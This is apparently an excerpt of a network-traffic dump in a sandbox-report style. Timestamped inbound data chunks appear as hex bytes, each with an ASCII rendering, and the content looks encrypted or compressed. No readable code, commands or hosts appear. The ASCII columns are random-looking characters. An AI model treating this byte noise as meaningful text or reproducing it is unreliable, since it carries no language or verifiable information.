                                                                                                                                                                                2021-11-11 11:26:04 UTC2147INData Raw: 92 0c 23 9a 06 eb 44 5f 62 67 c2 5d 2f 48 b8 af 10 18 b3 4f 94 20 07 6a 80 75 78 c0 b0 04 ba ad c9 6f 48 68 3a 84 e8 17 a4 70 a9 62 77 18 26 64 52 28 30 1a 67 1c ee 59 52 2d 69 e1 87 f8 64 cc bc 42 3f f5 f9 09 2d 80 3a e0 0c 60 ef 77 4e 09 1b f1 9e 85 58 f0 13 72 b2 6d eb 2c 2e 28 46 7f 04 3f 91 fd ff 29 0a 1e 23 61 bb 10 51 fe b0 98 a4 8b 94 94 43 7f af 02 98 fd 2a 40 a0 6b 5d 22 25 4b d6 dc 1d 40 ce 30 fb d9 4c fd 8a c3 ee 9d 43 27 71 f8 02 8e 64 33 49 1c 1b 2f ed ca 80 de 83 70 96 f8 01 c1 d1 a0 63 b2 9e dc 80 54 07 c6 3d 4d 0e c3 27 99 2f 54 63 a6 3b b8 80 3c 15 5c 0b 4a 79 c6 38 8d dd 5d a8 84 69 04 21 06 9a 8a 54 f5 a9 92 43 de 26 09 1c 9f b6 b2 f7 01 12 96 15 03 70 48 b7 03 99 1c f1 77 16 21 d4 ba b3 99 00 27 4e 64 e7 91 02 38 92 56 09 3f 7f 99 b7
                                                                                                                                                                                Data Ascii: #D_bg]/HO juxoHh:pbw&dR(0gYR-idB?-:`wNXrm,.(F?)#aQC*@k]"%K@0LC'qd3I/pcT=M'/Tc;<\Jy8]i!TC&pHw!'Nd8V?
                                                                                                                                                                                2021-11-11 11:26:04 UTC2163INData Raw: 7f 30 63 a4 3a 24 db 6a bd 03 26 af 1a 00 3c f6 6c f5 88 54 22 98 1b 70 2e 8c 78 c7 4c 64 f3 10 15 a7 16 12 aa 5e ba 33 92 df 4b 99 d0 d1 98 47 b4 13 58 e4 3c f8 98 d3 a8 81 89 69 92 5b f7 f8 24 30 e2 bb b4 c4 17 27 94 05 c0 99 8c 20 38 00 0a 26 6f a7 db 74 07 87 4b 0d f8 22 41 44 82 68 60 48 6a 05 55 79 22 31 68 20 88 b8 60 0c b6 ee 41 30 e3 5e 3c cc a6 49 17 a4 9d b7 a3 ae 05 82 9a e9 3b 06 5e fa eb 74 2f 44 c1 e4 cd 2e 25 3f 93 63 9f a0 2f 54 56 80 1d 19 c6 1d 81 2d 49 0e fb 78 b1 b4 da fe 8c fd f2 97 10 bc c0 5c ea 42 f0 87 f8 4b 16 cb 58 5b 8c 84 2b 00 03 81 19 99 ce 2a f7 7c 62 93 28 e6 ee d3 74 be 44 dc 7e 09 a8 d0 07 90 03 ca 89 39 c0 73 0f 00 70 cb 46 6b 36 53 7b d8 4b 09 fa 39 bb 2f ba 3a 6f 27 02 00 81 68 9c 4d 37 4b 22 fe 2f d5 5b ac fe e0 e0
                                                                                                                                                                                Data Ascii: 0c:$j&<lT"p.xLd^3KGX<i[$0' 8&otK"ADh`HjUy"1h `A0^<I;^t/D.%?c/TV-Ix\BKX[+*|b(tD~9spFk6S{K9/:o'hM7K"/[
                                                                                                                                                                                2021-11-11 11:26:04 UTC2179INData Raw: 80 20 f9 63 07 0c 05 c2 26 ad 3b 14 42 42 c7 00 c5 eb 15 dd c0 40 80 c0 d2 2d ac 09 a7 14 21 6a 61 bc 05 6e 06 dc 4d f0 54 7c 09 25 90 32 86 44 4c a0 30 36 02 08 f8 0e 69 77 b7 da a5 70 60 2a 6d e0 03 26 17 ea 68 06 bd 1a 7c b0 c1 d8 42 2f 79 1f b1 64 a5 dd 40 ce d4 42 21 18 90 53 df 60 d7 30 e1 51 7a 2a d2 94 0c 66 90 5e bd 8b 4f fa 70 68 2d 98 82 18 2f 7a 33 18 a1 b8 80 c8 1e 72 15 2e 4c 2a 30 42 d8 31 52 b4 27 f5 25 fe 35 00 ba 7c 88 86 3d 66 c1 26 ad 87 f9 11 9e ea d3 40 19 2a c5 06 eb 94 12 e6 9c 56 fb 30 74 a2 de f7 f1 24 89 52 4a ba 94 45 aa a6 d3 10 57 bf 85 01 fa af d8 06 29 25 da 5b d7 e5 0c 07 21 64 39 00 51 55 bd ef 12 ce c1 10 ff ce c7 60 32 68 56 07 df e9 3f a2 80 d2 bb e2 05 92 39 15 7a 84 f8 bb f8 75 ed 2e aa 6e a7 5e fc c8 f0 52 68 53 24
                                                                                                                                                                                Data Ascii: c&;BB@-!janMT|%2DL06iwp`*m&h|B/yd@B!S`0Qz*f^Oph-/z3r.L*0B1R'%5|=f&@*V0t$RJEW)%[!d9QU`2hV?9zu.n^RhS$
                                                                                                                                                                                2021-11-11 11:26:04 UTC2195INData Raw: 35 6b 4f 12 66 41 c8 ff a4 6b 18 9d 40 6d 5f c6 09 e5 86 c0 25 d7 6d 0a 0e 52 7e d1 65 f8 84 d1 93 22 3c 41 1c ed 19 2a dc 40 63 14 53 a8 ef 2c 25 72 75 20 6f b1 8c b2 5b 15 f3 a4 be d1 3d 8d 02 02 5a 16 a7 35 70 de 3d 67 04 5a d9 a4 d0 6e 56 06 48 ca b8 06 b7 cc e6 b4 02 67 53 6f 94 79 e9 f5 f9 ff 82 f5 45 c2 11 fc 3c 14 68 e6 71 00 fb f4 31 1e 26 ca 84 74 00 d8 13 ac 5d c1 9c df 27 08 2d e6 23 ab 0b a3 9d df 6c 53 31 7a 37 7c 1a 26 2b a9 d1 92 ab 28 e7 ba 99 dc 24 e2 05 dd 09 38 80 3c e3 4d 2a 07 bf 75 f7 db c1 86 02 0a fa eb 09 bc 67 f8 d4 f8 32 3d 01 ea 82 c2 78 b9 e7 3f 62 e7 77 d9 db 9b 0d 84 81 65 a7 58 e9 c7 4a 4d fe 28 26 c9 04 bb a9 24 0f 55 c0 4f a5 72 f0 00 d5 70 2f b8 35 09 89 f3 c5 e4 92 86 c0 d8 d2 3e 98 3d 79 d1 ae b8 d0 2f 42 e9 c4 23 09
                                                                                                                                                                                Data Ascii: 5kOfAk@m_%mR~e"<A*@cS,%ru o[=Z5p=gZnVHgSoyE<hq1&t]'-#lS1z7|&+($8<M*ug2=x?bweXJM(&$UOrp/5>=y/B#
                                                                                                                                                                                2021-11-11 11:26:04 UTC2211INData Raw: ff 87 75 e6 0c 83 89 2a 60 68 fd 02 b4 fa f9 2b 65 f1 5f 89 80 d1 d8 80 55 91 11 da aa 85 b0 c9 c9 34 c5 57 46 c8 bf a3 6d 35 cb 02 20 82 27 a6 42 cd 77 c0 f0 c8 60 c5 20 f3 46 fe 25 e6 5e 0e 64 48 8b 3b 18 48 5c d6 a0 c0 1c a5 94 10 c4 72 b7 82 bc 7b c1 00 62 0a e1 5b 0c 33 fa 67 c3 2c b8 01 57 ab 34 4f 64 02 be 82 54 62 2c 25 3d d5 d9 eb c3 73 17 84 31 bc 6b 81 10 59 bf 92 f2 eb 46 a4 15 00 30 a7 4e 8d 71 44 f7 b4 05 42 1d 68 09 7a a4 c5 60 4a c3 be 20 81 fd a3 0a 0f d6 32 a9 52 95 ac 14 11 34 13 8f 42 c1 56 fb 87 65 22 a8 1c f6 97 67 dd 18 24 85 51 18 35 de 01 39 bf 10 bc 69 96 1f c0 f6 c2 dc 79 24 cf fe aa 93 59 bc ef 22 88 28 b2 52 c8 b6 0e 81 5e dc d1 cf 42 7a 06 10 03 05 18 02 de e3 ec c7 32 65 00 a3 2c 82 ac 00 c8 2b 17 28 18 75 23 36 12 b9 dd 38
                                                                                                                                                                                Data Ascii: u*`h+e_U4WFm5 'Bw` F%^dH;H\r{b[3g,W4OdTb,%=s1kYF0NqDBhz`J 2R4BVe"g$Q59iy$Y"(R^Bz2e,+(u#68
                                                                                                                                                                                2021-11-11 11:26:04 UTC2227INData Raw: 03 94 d8 ea fc 0f 19 c8 b6 c4 fb da 57 f6 e1 40 a7 47 85 03 c6 1c c4 59 a0 32 91 fd 08 94 66 e0 28 dd df e2 31 f6 c6 1c 89 1f 2a e4 6d 9a 63 de 4c 68 5b 09 48 9b 39 ed fe 00 c1 f7 58 4a 12 fe de 39 09 1d a9 12 74 42 56 79 c9 89 99 29 11 84 32 2a 09 f4 1c dd d1 83 84 68 56 4e 40 12 91 c9 d3 65 72 f2 62 7c 18 35 72 f8 4b 06 9b 9c de ab 7a c4 71 f4 c0 18 78 8f 8c 7c 0e 4f 0b ee 62 30 43 39 4a 16 18 4f f2 06 fd b1 c0 24 30 77 14 10 81 d2 62 04 ba d1 9f fc ed 91 dc 55 21 6f 06 51 22 96 ac 30 5d 3a 1c 08 4b ff 0c f2 54 fd 04 1a 2d 44 aa 86 18 44 a5 79 8c c9 72 bd dc e0 43 e7 f3 84 30 47 28 10 09 1e 85 bd b2 c0 0a c9 3c 02 0b 15 4f bc 35 af f1 45 80 c3 f8 61 1a 66 6c f4 c9 c0 30 de 64 dd b7 28 00 63 5b 5a 9e 6e ca 75 77 b5 60 fc 70 54 21 ef 42 00 f6 30 6d 72 f3
                                                                                                                                                                                Data Ascii: W@GY2f(1*mcLh[H9XJ9tBVy)2*hVN@erb|5rKzqx|Ob0C9JO$0wbU!oQ"0]:KT-DDyrC0G(<O5Eafl0d(c[Znuw`pT!B0mr
                                                                                                                                                                                2021-11-11 11:26:04 UTC2243INData Raw: c9 59 ec 2a 8d 66 6f f1 5f 21 00 6e e8 19 92 72 b6 a4 ab c7 f5 c2 66 4a c8 de 7d 76 cc d6 1e 24 fe 64 4b 30 9f bc 8e 16 5b b7 f8 30 16 a1 de a0 7e 9c 48 2a 1e 0c 66 0f 27 08 60 00 1d 2b 4d 26 a0 d6 21 08 4a 52 cc 45 be 03 c9 9a fc 5e f7 d6 f0 ba 33 ea 00 3f 79 c1 e2 01 81 f2 88 16 1d d2 2b c2 d8 31 7f d1 bf 62 92 49 7c 1d c2 56 79 7c 2f c3 e0 4f 19 12 8d 85 76 0b 8a 3a a0 3a 0b 04 81 ad 03 04 8e 91 03 0a ed e4 80 71 96 0c 5c 80 02 83 30 76 c2 95 54 cd 14 0e d8 70 02 10 8b 5e d7 84 e6 b1 99 d0 38 1d 8b 0c fc 2e d8 d0 e3 bf 30 38 96 5e 8e 30 ce 2d 12 27 76 ed 0e b3 a5 90 f8 c4 0e d4 ee 71 48 e1 73 01 86 3e 3b 30 3e e9 ba c2 4c d9 d0 30 4a 51 e8 39 44 9a da 31 9a 6e 93 2f bb 34 ee e0 c1 15 e8 e4 f5 c9 01 f0 64 84 29 cd 8a d5 02 80 50 01 03 ad 5c 19 51 c3 60
                                                                                                                                                                                Data Ascii: Y*fo_!nrfJ}v$dK0[0~H*f'`+M&!JRE^3?y+1bI|Vy|/Ov::q\0vTp^8.08^0-'vqHs>;0>L0JQ9D1n/4d)P\Q`
                                                                                                                                                                                2021-11-11 11:26:04 UTC2259INData Raw: 94 e9 5a b4 e3 0a a1 f5 47 af 12 d7 98 df 6f bb 3d e7 29 21 1c 02 78 38 d9 4c 54 ef 44 19 a5 2d a4 3a ce 09 2e 1d cc b1 bd e5 8a 96 66 f0 04 9d 00 78 5f b4 68 15 86 39 09 a4 38 0b 2a 54 ea 58 5d 16 6e 27 56 a7 50 3f a0 2b 8e 1f 27 84 5c 73 58 6b 64 e6 40 42 53 b7 d1 76 24 28 00 dc 3d b6 7e 59 81 05 e9 f0 16 b7 3a a4 47 e6 13 26 ff 43 a8 54 5e a9 ce c6 0e 5b 54 9d f4 b1 5c 95 7e 1d f3 17 54 66 07 a9 e6 0c e0 ec 03 0d 92 50 a1 bb a7 16 9b 05 f5 cc 4f 68 02 e8 ab d1 2d 5d 31 f7 51 70 c2 bd 49 d7 e7 f9 e8 9e 88 41 8a 12 50 bb cd 58 3b f3 06 92 ab cf 86 17 e6 82 9d b6 3f b2 f7 92 c4 4a ff 6c 36 6d 40 8e 0f 38 7e 38 80 d0 ba 0d cc 30 86 69 00 a4 46 a8 19 e4 85 b0 b4 00 13 09 2b 9e 3b 6c af aa 00 ca ee 10 71 a7 ac b9 a2 1e d3 5a 9f df 03 53 e7 a4 d6 c8 9d 00 88
                                                                                                                                                                                Data Ascii: ZGo=)!x8LTD-:.fx_h98*TX]n'VP?+'\sXkd@BSv$(=~Y:G&CT^[T\~TfPOh-]1QpIAPX;?Jl6m@8~80iF+;lqZS
                                                                                                                                                                                2021-11-11 11:26:04 UTC2275INData Raw: a4 89 16 05 2f fd ed 2a 08 07 6c 1c 13 3c f0 4a 36 0b d4 94 af 2d df 00 cb 95 10 86 04 33 51 28 20 1b d3 40 b8 31 78 cd 18 90 e7 4d 18 84 9d 25 a9 f8 dd 90 88 e9 cf 30 17 19 6e 65 50 3b 01 71 da 97 42 d3 ec 12 83 38 68 40 aa 06 f4 e9 b5 00 d7 5c 37 77 81 f7 a7 3b 2d 35 7e 9f 55 29 79 65 ba c0 e9 a5 e6 fe b7 79 ef e4 c0 fb 8e ac 57 7c 1c af d7 2d 5f 1c 98 9f 5c 05 52 7d 65 b3 0d 53 e5 88 d4 f0 1b c6 59 ae 2b fe 00 9a 96 9b 07 b6 e4 51 c8 aa 8a fc 02 12 d4 20 0a 28 4d 03 9d f4 7c 64 4a 52 af a4 f2 c8 00 9d b3 5e 81 e3 7b fc cb 12 76 f7 db 03 c9 75 b5 ff df e1 eb 08 2c da fd 61 0d 01 fc f3 4e 1d da f9 4c d7 df bb 71 9c c7 58 2f a3 40 9c 34 03 c8 7c 68 05 cd a7 ae 7f 58 bc 32 60 06 06 25 7e fe 01 bf 1f 2d fc e5 13 17 65 7c 3a b9 26 d3 eb 72 d9 94 de 87 30 2a
                                                                                                                                                                                Data Ascii: /*l<J6-3Q( @1xM%0neP;qB8h@\7w;-5~U)yeyW|-_\R}eSY+Q (M|dJR^{vu,aNLqX/@4|hX2`%~-e|:&r0*
                                                                                                                                                                                2021-11-11 11:26:04 UTC2291INData Raw: c2 d1 a7 08 2d 9b 0d d5 76 38 f5 1c fd e1 82 1e 11 a3 07 3e 5c 49 88 06 fd 22 f5 e4 41 4f 92 46 77 0d b8 24 4e 36 01 ef d7 03 fa 79 8c 0c 6a ab 08 62 bd e0 f3 a3 52 7f ca 4b b4 fb 45 17 ce 81 00 62 b6 5a 14 08 30 49 b4 20 80 92 ad ab f5 4c 27 9f c4 77 c8 35 4d 15 0b f8 ff fd 8a 12 04 41 c6 ee 2e b1 c7 ea f3 31 31 64 89 43 2d c5 12 6a e9 43 b2 50 c9 2f 07 14 c1 f9 93 14 d1 1b f1 32 cc 0a df 77 f5 02 b1 85 67 99 c5 5c b9 c4 34 68 3b 86 a2 d4 54 2f 10 ae 25 f3 dc 4b c4 57 80 0c b5 e5 6f 21 95 6e db 9f 5b 4e 0b ab bb ec c3 c0 1e 56 be dc 36 69 4e 21 e3 8a 61 1c e9 0e 54 81 34 93 e2 18 26 2d 47 8f 85 67 f8 09 18 81 cb 08 09 af f5 3b 06 f7 d7 da a4 25 c5 bd 40 a7 86 dd 6e 79 14 6c e9 c4 66 60 c9 2c 9f 52 b8 39 c2 f8 5c b4 5b 77 cc 64 d0 04 10 5d 4a 00 ef 8a a7
                                                                                                                                                                                Data Ascii: -v8>\I"AOFw$N6yjbRKEbZ0I L'w5MA.11dC-jCP/2wg\4h;T/%KWo!n[NV6iN!aT4&-Gg;%@nylf`,R9\[wd]J
                                                                                                                                                                                2021-11-11 11:26:04 UTC2307INData Raw: 31 6a 64 30 de 66 82 08 65 9f da 23 44 e7 01 d3 70 73 90 1c 57 f8 3b aa 28 45 a1 13 03 f2 1f 88 fe 20 81 55 3a b6 5e 7f 9d 5f 1a 35 61 59 a0 80 dc 3c 98 fa 95 0e 68 09 17 47 8a e6 df 78 2d 4e 61 fb da 4b c2 ea c8 54 9f 1e aa 5d 95 51 05 5a 36 0f 27 e9 5e d8 df 25 68 c6 f3 ab c9 5d fb 73 a7 f4 54 70 e7 8e 80 cb fd 07 2c a1 64 ee 71 e2 95 72 fa 20 bd e5 c1 6c 18 68 0e ef 79 73 01 d6 10 f5 08 25 58 10 fb bb 4b b7 66 0d 12 04 e0 c3 ee a1 e7 7b bd d2 a0 94 99 bf 45 55 02 07 5b 98 8f 22 d7 dd 5c 49 51 c3 c0 f3 09 e0 c2 40 e8 6c c7 48 d9 35 fc 70 01 fe da 30 51 e6 14 17 31 02 c8 28 58 43 95 7a 02 50 68 07 eb aa 67 fa 26 f2 9d 13 d0 e8 13 ff 8a 79 0c 53 b4 fd 38 44 12 3f f5 75 f8 ae d4 6f 3c 7d 4e ca 77 00 4f a2 f1 ff 56 68 94 02 9e ef 5c 5e f7 de 75 09 b9 44 c0
                                                                                                                                                                                Data Ascii: 1jd0fe#DpsW;(E U:^_5aY<hGx-NaKT]QZ6'^%h]sTp,dqr lhys%XKf{EU["\IQ@lH5p0Q1(XCzPhg&yS8D?uo<}NwOVh\^uD
                                                                                                                                                                                2021-11-11 11:26:04 UTC2323INData Raw: b3 80 97 ac f5 9b 02 ed 1a 00 b0 5f 8e 28 59 dc 78 5c 00 ca 5e 6c 4b 76 ef 41 93 3a 5a 0b 00 a8 0c 19 ab 2f fa 3c 00 f7 4e 32 68 92 e0 f3 b7 00 d9 e6 ad e8 27 2b a8 f0 00 b1 9c a4 11 99 1d 31 79 3e a5 8d bf 78 00 a6 97 9d 06 33 d3 c5 00 b9 02 b3 c7 fa 17 f4 23 00 8c 1a f6 40 da d1 38 54 00 bf 7a 4e 13 09 72 30 0e 1c 81 8f cd ff 00 a5 42 a4 cf 39 b4 47 00 b3 95 63 44 0a 6a b8 ec 70 98 05 e3 19 5e 4d 8f 80 b3 11 5b c5 00 ea 68 ce a9 35 04 7d a5 18 2c 4c 71 f8 38 7c 00 de c6 63 84 70 8f 6f c4 00 2e 8a 93 43 4f 37 f1 a0 f4 a7 78 58 48 48 9a 0f 2b ee 42 e0 67 76 ca d7 b7 00 f6 a5 10 ef 65 69 61 7d 00 18 85 c2 32 fb 80 84 94 00 33 91 f1 bf 37 b5 db 6c 00 d1 42 d3 a6 a4 22 e6 ab 00 bd d5 4c 9d 08 ca e3 b4 00 8c 66 ec 61 f6 d2 9e 57 3a 83 1a 9f f7 e7 00 82 dc d9
                                                                                                                                                                                Data Ascii: _(Yx\^lKvA:Z/<N2h'+1y>x3#@8TzNr0B9GcDjp^M[h5},Lq8|cpo.CO7xXHH+Bgveia}237lB"LfaW:
                                                                                                                                                                                2021-11-11 11:26:04 UTC2339INData Raw: 35 07 ee 4d 00 47 6a 25 92 84 9d 18 a8 03 e4 a9 a0 b4 e7 d3 e0 4e 89 9a ec 74 00 cc 0e f2 49 8b fc ea c7 07 22 df 76 0a 33 c1 bc 1c 17 d0 bd 91 00 92 93 cd 2e fc 65 3e 0a 38 16 30 80 47 a5 ec 4d 59 24 aa e2 07 04 d6 d2 80 31 6c c0 42 05 18 36 07 3a 50 63 ba df 53 f7 83 b3 96 e0 6b d4 98 00 1d 62 de 26 b9 b0 a5 54 00 78 e1 b4 7c b3 7b 82 15 5a a3 f0 9f b2 00 b9 3c ef 02 c4 23 2f 4e 0f d6 8f 01 1e 40 30 59 fb 67 e2 00 79 5d 52 21 98 24 3d ee 00 9e 8f 2c 7d ed c3 a2 ba 70 f0 00 49 da 20 05 cb 69 13 46 e4 5e 0e 56 77 4c 62 20 0c 59 90 8f 17 00 c7 06 75 dd ed 57 5c 3b 00 3e ab b5 e0 a1 0a 7e 74 00 de 42 c2 c8 f4 48 51 ac 00 8a 30 34 65 25 80 55 4b f6 3b 1e d8 81 35 3d 00 29 6d f4 6f 02 4c d7 00 9d 47 50 3e 92 aa 9c 5d 07 5a 6e b9 72 53 e1 0e 30 2d d0 95 85 3e
                                                                                                                                                                                Data Ascii: 5MGj%NtI"v3.e>80GMY$1lB6:PcSkb&Tx|{Z<#/N@0Ygy]R!$=,}pI iF^VwLb YuW\;>~tBHQ04e%UK;5=)moLGP>]ZnrS0->
                                                                                                                                                                                2021-11-11 11:26:04 UTC2355INData Raw: 02 18 9f b6 e7 39 a5 c1 7a 6d 3f 91 7f d6 83 3b bb 20 82 0e 8c ba 63 08 28 dc ec 87 0b f5 4f ac bc 0c fb fd 53 0c e2 0f 83 d5 6f 29 9f 94 eb 08 50 6e cf 1f 6e f3 74 01 f5 9f 95 0e 27 24 74 58 99 8f 89 68 38 57 4e ee 9d 76 c6 7e bd 3a 2c d5 4d 22 af f9 66 e9 90 ca 44 13 b2 63 31 9c 95 0b bc 83 40 a4 2a 57 bf 02 82 1f 9f 3e f7 d7 c1 b0 02 60 5f 32 16 78 d2 eb 01 b3 f0 9c fd 36 60 b0 f3 18 5e b5 39 0c a5 dd 1f fe 18 46 40 f6 0e 55 f2 89 29 2c f0 5e b5 2f f4 c8 40 12 db fe 7f bf 58 41 5b e1 ae 00 c9 f1 f9 3e b1 7d 63 49 0e 8e bd e8 ef 01 c8 05 59 5f e9 58 05 00 aa b6 4f 1f 9a 80 00 29 e5 39 f2 6f 0f e0 51 00 d1 c2 83 7b 6e 2d 31 aa 3b dd 54 80 08 d4 4b 62 50 2f eb 00 4e 92 61 47 0e 06 96 68 3c ae c3 a7 4f 54 8a 40 71 6b 12 50 95 f7 b4 1d 40 2c 5d 48 91 3d 5f
                                                                                                                                                                                Data Ascii: 9zm?; c(OSo)Pnnt'$tXh8WNv~:,M"fDc1@*W>`_2x6`^9F@U),^/@XA[>}cIY_XO)9oQ{n-1;TKbP/NaGh<OT@qkP@,]H=_
                                                                                                                                                                                2021-11-11 11:26:04 UTC2367INData Raw: 00 5f 1e c9 ed 6b 78 3b bd 3a 41 96 80 57 c7 7c cc d6 03 c8 1d 3a 4a 14 c0 3c 1a 6a be 76 24 00 4b 6f d2 8e 5b 9f 73 c6 00 ec 2e 33 e7 3b cf 03 54 00 5d 48 b5 81 5f 69 d1 6e 1d 73 35 fc 40 8b 12 10 8e 18 92 00 0b 71 a5 b9 66 7d 37 70 00 48 5a 28 36 31 7a d7 cf 12 cb 63 24 1d 2e 00 fd 0d 3b 39 2c 14 00 20 e9 3f ca 0a b0 1f cc 00 46 93 1b 5b d1 2b b9 f8 00 6a 9f 5d fa b2 1a 5f 12 2c 4b 4e dd 3e 7f 00 7a 8a 9b 3c af 9c 2a c6 00 b4 82 55 e1 f6 a6 1f 71 00 fd 26 a5 39 c3 ef b8 53 fe d8 03 90 a1 b0 0d 2f 95 80 e1 60 13 00 04 25 3b e2 f6 43 80 28 0e 69 9c f7 cb e0 b2 21 ae 37 62 1d 27 4a 4b c7 a5 e0 71 20 0a 05 b9 e4 00 b1 6f 99 60 fa d1 a4 13 1e 22 73 ea c1 b2 fd 7b 40 1c f4 c8 1f 00 97 bd 4c 3d 1e f7 e5 1b 00 ee 90 b1 46 71 2a 38 26 00 da cf c8 2e e7 8d 54 3b
                                                                                                                                                                                Data Ascii: _kx;:AW|:J<jv$Ko[s.3;T]H_ins5@qf}7pHZ(61zc$.;9, ?F[+j]_,KN>z<*Uq&9S/`%;C(i!7b'JKq o`"s{@L=Fq*8&.T;
                                                                                                                                                                                2021-11-11 11:26:04 UTC2383INData Raw: 91 fc 40 94 c0 39 37 e0 53 00 a1 0b d7 99 50 cf 56 22 00 43 4d 19 ca 57 ec 0c ba 26 c1 6e 56 03 9c a7 9e 08 80 40 65 fd 01 8e 84 e9 7f d0 23 da d8 48 67 1e 21 60 77 03 53 3c 70 06 b0 79 37 31 00 19 46 bc a1 03 2e 51 e8 e3 e8 87 fd 00 3e f7 a9 6c 7f 22 7d 26 00 66 76 c3 dc 56 f8 80 12 00 fd d0 c0 47 15 f5 d6 09 00 5f 23 1a 96 97 46 29 e6 7f db 58 77 a3 07 60 f1 6b 5a 70 c5 d8 16 0c 3e f5 ed 80 10 76 c9 7b b4 24 7e 1d 74 d5 ef 00 3a 37 81 1e 47 ec 00 01 54 8c 08 aa 80 96 f9 00 0c 5c a8 c5 02 bf b0 2e 3e 73 c7 81 56 18 78 91 66 d1 cc 96 94 7b ab 00 e7 36 b4 86 f1 0a 8a fe 00 c4 d4 db 5e b9 bc 16 ad 00 68 8e 44 22 ba 9e 75 d8 00 df 30 63 29 12 e3 4a 07 00 74 dd 44 ca b4 81 f1 91 01 ac 9b a6 da 2b 45 b6 d4 e3 75 00 0d bb 0c a3 5e bd 8b b5 9c 61 00 89 f1 b6 d3
                                                                                                                                                                                Data Ascii: @97SPV"CMW&nV@e#Hg!`wS<py71F.Q>l"}&fvVG_#F)Xw`kZp>v{$~t:7GT\.>sVxf{6^hD"u0c)JtD+Eu^a
                                                                                                                                                                                2021-11-11 11:26:04 UTC2399INData Raw: 60 16 07 0a da e2 42 fa 9a 03 1c 75 51 33 c0 cf 1d 4c 1d 08 68 3e 01 0a d8 9e 22 d2 dc 5e a7 00 d3 a4 72 6e 98 6d e6 4b 00 45 c7 af 38 b7 82 d1 61 12 b2 09 90 00 1f dd f2 6e 23 a3 3e 56 8d 07 9a 21 67 c4 a0 ec 7f de bb 78 2e 00 f7 33 9c 0d 69 8b ad 53 38 2a 57 00 f0 c2 a3 ab 6d 0c 83 00 39 37 cd 11 f1 dd 3c 59 f8 21 00 36 b5 90 9c e4 64 d5 43 00 9f 4d 2c ba 96 af 7b be 00 17 e6 7f f7 62 58 cd f2 0c 03 53 60 50 66 33 00 4a 2f 3d 79 ed 02 da c9 00 9d 15 e0 6d 3b cd 0a 1b 00 0d e5 f2 af 37 9b 53 5c 1d 03 1a f0 8f 3a 55 c2 56 9e fd 80 c1 2d 7c 33 fc 00 e1 51 1f 26 e3 8f 22 72 00 b4 6e ba b1 1a c6 5c db 0f f0 5a d0 b7 80 a1 c1 d2 8e f1 01 68 5f ef 03 39 42 6e fb d0 5e af 1e 00 99 ac b3 9b 2a 86 71 50 00 84 bb 8f a8 f5 08 c0 c4 00 7d 61 01 38 0c 9b e0 22 00 15
                                                                                                                                                                                Data Ascii: `BuQ3Lh>"^rnmKE8an#>V!gx.3iS8*Wm97<Y!6dCM,{bXS`Pf3J/=ym;7S\:UV-|3Q&"rn\Zh_9Bn^*qP}a8"
                                                                                                                                                                                2021-11-11 11:26:04 UTC2415INData Raw: b0 30 10 15 c0 28 00 6e f4 12 dd 22 97 02 42 00 71 95 6c 49 2f 05 b5 d0 1f a5 88 1b 42 a8 f7 e7 ee 60 12 b6 34 00 3e 53 c0 42 48 89 33 f4 00 ad 13 c8 68 bb bc 73 03 00 e3 fe 7e 09 60 5b 6f e0 ec 19 71 7d fa 2b 07 57 24 b1 e2 22 e0 b7 ce 8b f7 00 0e 31 f4 29 c9 84 60 96 0f 03 48 eb e1 e0 0d a7 53 40 4d 00 cf 78 fa 47 09 cb 91 af f0 39 00 71 4f d5 aa 46 e5 58 c8 12 e2 8e c6 02 73 62 87 3c c0 8d 2e f4 b8 7e 00 70 dc f2 31 bf d4 21 e2 00 c6 a6 da 8d 63 dd 77 91 01 45 6e 6d 4e 12 f1 e0 e8 30 1a 03 50 5f 6b c3 8c d2 00 6c 90 03 9b be 55 59 6c 0e f7 5a 1c 4a 80 52 cb 17 83 23 0e 11 09 42 d9 e0 eb 8c dc 2a 44 00 ae 60 0f a4 5b 02 1f 19 e0 3b 00 57 ba ac 09 26 c6 cd 1b 00 7d 82 6e df 50 da b9 3b 90 b7 00 2d 15 35 af 57 bb d2 49 01 78 b4 4d 7a db 6d 74 f0 37 65 00
                                                                                                                                                                                Data Ascii: 0(n"BqlI/B`4>SBH3hs~`[oq}+W$"1)`HS@MxG9qOFXsb<.~p1!cwEnmN0P_klUYlZJR#B*D`[;W&}nP;-5WIxMzmt7e
                                                                                                                                                                                2021-11-11 11:26:04 UTC2431INData Raw: 0d 90 ad de 00 0a 73 78 ba ae 8a 7e e9 00 68 e0 b0 cf e3 93 d7 21 00 db f1 3c 18 df 83 b7 38 00 70 64 3b 07 29 2d 63 34 48 e4 7c 00 e7 4f 85 7d 19 ad 94 98 8a 3b f5 40 80 23 3c dc fb 1e 52 fd 7d 29 01 b1 66 4d 27 26 44 7f e1 6a f4 77 c2 07 01 b9 f6 92 33 50 19 7e b8 73 00 0e e8 62 68 98 ab 46 a7 00 4e 41 bd f6 dc 75 ba 94 00 4b ef 14 80 a4 a6 98 0e 03 a1 fd 81 5c 99 cd d0 21 54 2b 00 8b 9e 8e df b8 3a d0 c5 00 96 4d db 04 5a cd 61 f3 0c e0 21 c4 bf 20 f8 bf 58 e8 06 7a 52 98 5f 08 ec 00 9f f2 7e 2f 15 27 3a 45 00 74 35 8b 12 8e 7c bf ab 26 e3 91 9f 26 f5 07 b2 90 d1 92 b7 e6 60 4e 8f b3 00 25 45 c5 0d a2 bd 05 7a 39 3c fe 00 c2 46 d3 a5 8b d5 e0 f4 44 00 a7 f0 70 e9 08 2e 01 ef 00 da 90 fe 3b db ea 69 ac 00 c7 68 85 3a c1 93 15 3e 01 bf 19 73 a4 47 be 9d
                                                                                                                                                                                Data Ascii: sx~h!<8pd;)-c4H|O};@#<R})fM'&Djw3P~sbhFNAuK\!T+:MZa! XzR_~/':Et5|&&`N%Ez9<FDp.;ih:>sG
